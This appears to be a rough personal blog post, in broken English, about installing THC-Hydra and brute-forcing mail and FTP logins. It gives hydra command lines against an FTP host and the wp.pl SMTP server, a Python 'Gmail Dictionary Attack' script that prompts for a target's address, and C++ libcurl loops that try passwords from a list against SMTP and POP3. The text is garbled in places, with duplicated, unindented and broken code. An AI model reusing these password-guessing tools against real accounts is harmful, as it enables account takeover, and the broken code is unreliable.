cd /opt/
git clone https://github.com/vanhauser-thc/thc-hydra.git
sudo git clone https://github.com/vanhauser-thc/thc-hydra.git
sudo chown -R rea thc-hydra
sudo chmod -R 755 thc-hydra
sudo apt-get install zlib1g-dev libssl-dev libidn11-dev libcurses-ocaml-dev libpcre3-dev libpq-dev libsvn-dev libafpclient-dev libssh-dev
./configure
sudo apt-get install client-dev libncp-dev librf-dev libocci-dev libclntsh-dev libaio-dev
cd /opt/thc-hydra
./configure
make
make -i386-pc-linux-gnu
sudo make install
/usr/local/bin/hydra -t 1 -l admin -P /home/rea/list.lst -vV 192.168.1.1 ftp
ps: try this
http://www.cybercrimetech.com/2015/08/how-to-installing-thc-hydra-in-ubuntu.html
pps: try
http://www.binarytides.com/crack-ftp-passwords-with-thc-hydra-tutorial/
----------------------------------------funny.py---------------------------------------
python
#!/usr/bin/env python
import itertools
plik = open('plik', 'w')
res = itertools.permutations('abcdefghijklmnoprstwyxz1234567890',3)
for i in res:
plik.write('\n')
plik.writelines(i)
plik.close()
import itertools
plik = open('plik', 'w')
res = itertools.permutations('abcdefghijklmnoprstwyxz1234567890',3)
for i in res:
plik.write('\n')
plik.writelines(i)
plik.close()
-----------------------------------but i cant find ada---------------------------------------
hydra -l lol@wp.pl -P /home/rea/list.lst -S -e ns -V -s 465 smtp.wp.pl smtp
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZto gmail "i wirte" (ok i'm copy pase from another site) source easy hydra thc look like this:
-----------------------------------source easy "hydra" lubuntu----------------------------------
#!/usr/bin/env python
# Program: Gmail Dictionary Attack v2
# Author: BurnCT
# Purpose: Brute force smtp.gmail.com using a dictionary attack over TLS.
import smtplib
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
user = raw_input("Enter the target's email address: ")
passwfile = raw_input("Enter the password file name: ")
passwfile = open(passwfile, "r")
for password in passwfile:
try:
smtpserver.login(user, password)
print "[+] Password Found: %s" % password
except smtplib.SMTPAuthenticationError:
continue
else:
print("\n\n\n loggin "+" - password ---->>> "+password[:-1]+"\n\n\n\n\n")
break
------to run in teminal write--------------------python hydra.py----------------------
bat i have another problem with this---
http://stackoverflow.com/questions/26697565/django-smtpauthenticationerror
so gmail have blocad and i can't with this metod crack my accont
i download "PassGen"
from here and a have error in run python pasgen.py
==================================YOU C=====================================================
i write same like this but it's not finished yet
============================================================================================
//sudo apt-get instal curl
//$ g++ en5ail.cpp -o enail -l curl
#include
#include
#include
#define server "smtps://smtp.wp.pl"
#define to "???@gmail.com"
#define from "???@wp.pl"
#define pwd "???????"
#define TRUE 1
#define FALSE 0
int main(){
char *info[] =
{
"not work",
"hhhhhhh",
"wertadfg",
"lol",
NULL
};
int i=0;
do
{
CURLcode res = CURLE_OK;
CURL* curl = curl_easy_init();
if (curl)
{
printf(info[i]);
curl_easy_setopt(curl, CURLOPT_URL, server);
curl_easy_setopt(curl, CURLOPT_USERNAME, from);
curl_easy_setopt(curl, CURLOPT_PASSWORD, info[i]);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 2L);
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
res = curl_easy_perform(curl);
if(res != CURLE_OK)
fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
curl_easy_cleanup(curl);
}
else
{
printf(info[i]);
}
i++;
}
while(1 !=CURLE_OK);
return 0;
}
But it's not work wery well this should be fine:
==============================================#include <curl/curl.h>
#include <stdio.h>
#include <stdlib.h>
#include<iostream>
#include<fstream>
#define server "pop3://pop3.wp.pl"
#define from "<lol>@wp.pl"
#define TRUE 1
#define FALSE 0
using namespace std;
int main(){
char buff [50];
ifstream infile;
infile.open("file.txt"); /*file with password list*/
if (!infile) return 0;
int i=0;
CURLcode res = CURLE_OK;
do
{
while (!infile.eof()) {
infile.getline(buff, sizeof(buff));
cout<<buff<<endl;
CURL* curl = curl_easy_init();
if (curl)
{
printf(buff);
curl_easy_setopt(curl, CURLOPT_URL, server);
curl_easy_setopt(curl, CURLOPT_USERNAME, <lol>);
curl_easy_setopt(curl, CURLOPT_PASSWORD,buff);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 2L);
curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L);
curl_easy_setopt(curl, CURLOPT_UPLOAD, 1L);
res = curl_easy_perform(curl);
printf(buff);
if(res != CURLE_OK)
fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
curl_easy_cleanup(curl);
}
}
}
while(res != CURLE_OK);
infile.close();
return 0;
}
Newermind it's openssl hool:
curl echo "R\nQ" | timeout 10 openssl s_client -connect www.nk.pl:443
No comments:
Post a Comment